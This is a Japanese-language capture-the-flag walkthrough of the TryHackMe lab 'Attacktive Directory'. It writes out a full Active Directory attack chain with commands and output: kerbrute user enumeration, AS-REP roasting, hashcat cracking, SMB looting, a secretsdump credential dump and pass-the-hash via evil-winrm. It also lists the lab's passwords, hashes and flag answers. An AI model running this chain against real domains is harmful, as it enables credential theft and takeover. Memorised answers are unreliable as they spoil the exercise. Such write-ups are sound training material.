概要
TryHackMe「Attacktive Directory」のWalkthroughです。
Task3
Q1.What tool will allow us to enumerate port 139/445?
A.enum4linux
Q2.What is the NetBIOS-Domain Name of the machine?
ポートスキャンを実行します。
$ nmap -Pn -T4 -sVC -A -p- 10.10.148.191 -oN nmap_result
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 07:29:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-01-20T07:02:52
|_Not valid after: 2025-07-22T07:02:52
|_ssl-date: 2025-01-21T07:30:12+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-01-21T07:30:03+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
ポートの稼働状況が分かりました。
SMBの列挙をします。
$ enum4linux -a 10.10.148.191
================================( Getting domain SID for 10.10.148.191 )================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
ドメイン名が分かりました。
A.THM-AD
Q3.What invalid TLD do people commonly use for their Active Directory Domain?
Hint.Spoiler: The full AD domain is spookysec.local
A..local
Task4
Q1.What command within Kerbrute will allow us to enumerate valid usernames?
Hint../kerbrute -h may help you
kerbruteをダウンロードします。
$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Helpを確認するとuserenumでユーザー名を列挙できるようです。
$ ./kerbrute_linux_amd64 -h
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/21/25 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
A.userenum
Q2.What notable account is discovered? (These should jump out at you)
ユーザー名のリストを取得します。
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
パスワードリストも取得します。
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
ユーザー名の列挙をします。
$ ./kerbrute_linux_amd64 userenum --dc 10.10.148.191 -d spookysec.local ./userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/21/25 - Ronnie Flathers @ropnop
2025/01/21 03:09:27 > Using KDC(s):
2025/01/21 03:09:27 > 10.10.148.191:88
2025/01/21 03:12:28 > [+] VALID USERNAME: james@spookysec.local
2025/01/21 03:12:32 > [+] VALID USERNAME: svc-admin@spookysec.local
2025/01/21 03:12:38 > [+] VALID USERNAME: James@spookysec.local
2025/01/21 03:12:40 > [+] VALID USERNAME: robin@spookysec.local
2025/01/21 03:13:01 > [+] VALID USERNAME: darkstar@spookysec.local
2025/01/21 03:13:16 > [+] VALID USERNAME: administrator@spookysec.local
2025/01/21 03:13:46 > [+] VALID USERNAME: backup@spookysec.local
2025/01/21 03:13:58 > [+] VALID USERNAME: paradox@spookysec.local
2025/01/21 03:15:16 > [+] VALID USERNAME: JAMES@spookysec.local
2025/01/21 03:15:42 > [+] VALID USERNAME: Robin@spookysec.local
2025/01/21 03:18:18 > [+] VALID USERNAME: Administrator@spookysec.local
2025/01/21 03:23:39 > [+] VALID USERNAME: Darkstar@spookysec.local
2025/01/21 03:25:19 > [+] VALID USERNAME: Paradox@spookysec.local
2025/01/21 03:31:02 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2025/01/21 03:32:40 > [+] VALID USERNAME: ori@spookysec.local
2025/01/21 03:35:40 > [+] VALID USERNAME: ROBIN@spookysec.local
2025/01/21 03:43:07 > Done! Tested 73317 usernames (16 valid) in 2020.169 seconds
複数のアカウントを列挙できました。
問題文から管理者ぽいのでsvc-adminを入力したら正解しました。
A.svc-admin
Q3.What is the other notable account is discovered? (These should jump out at you)
解凍の文字数から推測で。
A.backup
Task5
Q1.We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-adminアカウントで試してみるとハッシュ値を得られました。
$ impacket-GetNPUsers -no-pass -dc-ip 10.10.58.169 spookysec.local/svc-admin
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:0403193fcd65c16c6718824d6792b464$06a375535fbebc0f40ebe8f58376afb8981aebff702b40e5a1c991db3147c72915c589cee112912d923eb5050c89e5c4fa7e8e512594d5052228f775741c64cc4a637de8e2261eb0b276a3845d4dac87b193174bb8e8cb0bfd577a178a77c6aa05bc0dae851d32836b10b29869d3a9e158f27ac0eb554b5f6ceaf96cecfafc78a65a8aa620b3160c831fb15ac66b007fbb2226fb3079a7f2a0b27330f287b2489f3fa0f81d31fed946dc39f48c631b3030154604848ac38d8022396c149ba8e35da2119ecb894aeb5bef663c038c6cb9ee763c20c58fc1aa212d0100f22dc02c46c8d4ef98b5c760afe3ebc23de808555111
A.svc-admin
Q2.Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Hint.https://hashcat.net/wiki/doku.php?id=example_hashes and searching for the first part will help!
Hashcatの表からハッシュタイプを特定できました。
A.Kerberos 5 AS-REP etype 23
Q3.What mode is the hash?
A.18200
Q4.Now crack the hash with the modified password list provided, what is the user accounts password?
Hashcatで得られたハッシュ値を解析します。
$ hashcat -a 0 -m 18200 svc-admin_hash passwordlist.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:0403193fcd65c16c6718824d6792b464$06a375535fbebc0f40ebe8f58376afb8981aebff702b40e5a1c991db3147c72915c589cee112912d923eb5050c89e5c4fa7e8e512594d5052228f775741c64cc4a637de8e2261eb0b276a3845d4dac87b193174bb8e8cb0bfd577a178a77c6aa05bc0dae851d32836b10b29869d3a9e158f27ac0eb554b5f6ceaf96cecfafc78a65a8aa620b3160c831fb15ac66b007fbb2226fb3079a7f2a0b27330f287b2489f3fa0f81d31fed946dc39f48c631b3030154604848ac38d8022396c149ba8e35da2119ecb894aeb5bef663c038c6cb9ee763c20c58fc1aa212d0100f22dc02c46c8d4ef98b5c760afe3ebc23de808555111:management2005
A.management2005
Task6
Q1.What utility can we use to map remote SMB shares?
Hint.man smbclient will tell you a little bit about the tool!
A.smbclient
Q2.Which option will list shares?
Hint.man smbclient will tell you a little bit about the tool!
-Lで列挙できます。
$ smbclient --help
Usage: smbclient [OPTIONS] service <password>
-L, --list=HOST Get a list of shares available on a host
A.-L
Q3.How many remote shares is the server listing?
得られている認証情報でSMBの列挙をします。
$ smbclient -L 10.10.58.169 -U svc-admin%management2005
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
A.6
Q4.There is one particular share that we have access to that contains a text file. Which share is it?
backupに接続できました。
$ smbclient //10.10.58.169/backup -U svc-admin
Password for [WORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \>
A.backup
Q5.What is the content of the file?
Hint.The encoded contents of the file
ディレクトリを確認するとテキストファイルを発見しました。
smb: \> dir
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020
8247551 blocks of size 4096. 3564988 blocks available
ファイルからエンコードした文字列を得られました。
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
A.****
Q6.Decoding the contents of the file, what is the full contents?
base64でデコードし平文を特定できました。
$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
backup@spookysec.local:backup2517860
A.backup@spookysec.local:backup2517860
Task7
Q1.What method allowed us to dump NTDS.DIT?
Hint.Read the secretsdump output!
impacket-secretsdumpを実行するとDRSUAPIを使用していると出力空分かりました。
$ impacket-secretsdump spookysec.local/backup:backup2517860@10.10.58.169
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
A.DRSUAPI
Q2.What is the Administrators NTLM hash?
Administratorのハッシュ値を得られました。
$ impacket-secretsdump spookysec.local/backup:backup2517860@10.10.58.169
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
0e0363213e37b94221497260b0bcb4fcがNTLMハッシュ値です。
A.0e0363213e37b94221497260b0bcb4fc
Q3.What method of attack could allow us to authenticate as the user without the password?
A.Pass The Hash
Q4.Using a tool called Evil-WinRM what option will allow us to use a hash?
Hint.if Evil-WinRM is not installed, you can do so by issuing "gem install evil-winrm"
Helpで確認すると-Hだと分かりました。
$ evil-winrm --help
Evil-WinRM shell v3.5
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
A.-H
Task8
Q1.svc-admin
Administratorへハッシュ値を使用して接続します。
$ evil-winrm -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -i 10.10.58.169
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
C:\Users\svc-admin\Desktop\user.txt.txtからフラグを入手できました。
*Evil-WinRM* PS C:\Users\svc-admin> more Desktop\user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
A.TryHackMe{K3rb3r0s_Pr3_4uth}
Q2.backup
C:\Users\backup\Desktop\PrivEsc.txtからフラグを入手できました。
*Evil-WinRM* PS C:\Users> more backup\Desktop\PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
A.TryHackMe{B4ckM3UpSc0tty!}
Q3.Administrator
C:\Users\Administrator\Desktop\root.txtからフラグを入手できました。
*Evil-WinRM* PS C:\Users> more Administrator\Desktop\root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
A.TryHackMe{4ctiveD1rectoryM4st3r}